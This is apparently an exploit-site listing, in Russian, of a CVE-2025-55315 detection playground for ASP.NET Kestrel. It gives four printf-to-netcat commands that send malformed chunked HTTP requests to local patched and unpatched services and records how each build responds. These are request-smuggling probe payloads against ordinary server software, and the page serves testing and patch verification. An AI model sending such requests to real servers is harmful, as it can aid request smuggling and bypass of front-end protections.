Sploitus

Exploit for CVE-2025-55315-detection-playground

kitploit · 2026-09-03

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NICKCOPI-CVE-2025-55315-DETECTION-PLAYGROUND
Вот некоторые тесты, которые можно выполнить против этих сервисов, чтобы наблюдать различное поведение на маршрутах GET/POST между пропатченной и непропатченной версиями Kestrel.

GET против непропатченной версии (отправляет 200, и сокет остаётся открытым)

root@kitploit:~
    
    
    printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
    

GET против пропатченной версии (отправляет 200, и сокет закрывается)

root@kitploit:~
    
    
    printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
    

POST без обязательного CT против непропатченной версии (отправляет 200, и сокет остаётся открытым)

root@kitploit:~
    
    
    printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
    

POST без обязательного CT против пропатченной версии (отправляет 400, и сокет закрывается (процесс также выбрасывает обработанное исключение о Bad chunk extension))

root@kitploit:~
    
    
    printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001